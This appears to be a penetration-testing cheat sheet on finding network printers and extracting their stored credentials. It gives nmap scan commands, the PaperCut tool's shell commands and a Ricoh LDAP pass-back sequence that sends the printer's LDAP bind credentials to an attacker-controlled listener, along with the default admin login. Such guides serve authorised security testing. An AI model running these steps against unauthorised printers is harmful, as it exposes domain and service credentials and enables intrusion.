Skip to content

Printer Enumeration & Credential Exposure

Find printers with default admin credentials or stored LDAP, SMB, FTP, and email credentials. LDAP pass-back can send stored credentials to your listener.

Discovery

Port / Service What to look for
TCP 9100 (JetDirect) PJL model/status responses; PaperCut scanner.
TCP 80 / 443 (HTTP / HTTPS) Web administration, address books, connection settings.
TCP 515 / 631 (LPD / IPP) Printing services.
UDP 161 (SNMP) Device information.
Action Command
Find candidate printers sudo nmap -sS -n -Pn -p80,443,515,631,9100 --open --max-rate 50 -iL targets.txt -oA printer_candidates
Get SNMP description sudo nmap -sU -n -Pn -p161 --script snmp-sysdescr <printer_ip>

Quick start (PaperCut)

PaperCut requires Go 1.24+. Build locally:

git clone https://github.com/waffl3ss/PaperCut.git
cd PaperCut
make build
./papercut

PaperCut shell:

Action Command
Create workspace workspace create <engagement>
Scan workers set threads 10
Scan timeout (seconds) set timeout 2
Scan connections per second set rate 10
Show settings show
Scan one printer scan -t <printer_ip>
Scan IPs / CIDRs from file scan -t targets.txt
View printers results
Filter by manufacturer results --manufacturer ricoh
Find modules search ricoh / search passback

Scan queries PJL on TCP/9100. Check tests credentials or vulnerability conditions. Run executes the module.

What to check

Configuration Potential exposure
Web administration Default, blank, or device-derived passwords; configuration exports.
LDAP address lookup Bind credentials.
Scan-to-folder / address book SMB / FTP destinations and credentials.
Email / scan-to-email SMTP / POP3 credentials.

Targeted usage (LDAP pass-back)

ricoh/ldap/passback redirects the printer's LDAP test connection. Requires a supported Ricoh model, web admin access, stored LDAP credentials, and connectivity from the printer to your listener.

Action Command
Select the module use ricoh/ldap/passback
Module options options
Target printer set RHOST <printer_ip>
Listener address set LHOST <listener_ip>
Listener port set LPORT 1389
Callback timeout (seconds) set TIMEOUT 120
Printer admin credentials set USERNAME <printer_admin> / set PASSWORD <printer_password>
Test web login only check
Run pass-back run
View captured credentials creds
Leave module back
  • Settings are case-sensitive: lowercase globals (threads), uppercase module options (RHOST).
  • Default login: admin / blank. Leave PASSWORD unset in a fresh module selection to use it.

Notes / OPSEC

  • rate limits scan connections, not every module HTTP request.
  • Nmap excludes TCP/9100 from version detection because probes can print pages. Avoid --allports. Reference
  • SAFE modules may change settings temporarily. Record original settings and verify restoration and printer operation afterward.
  • Database and command history: ~/.PaperCut/.

References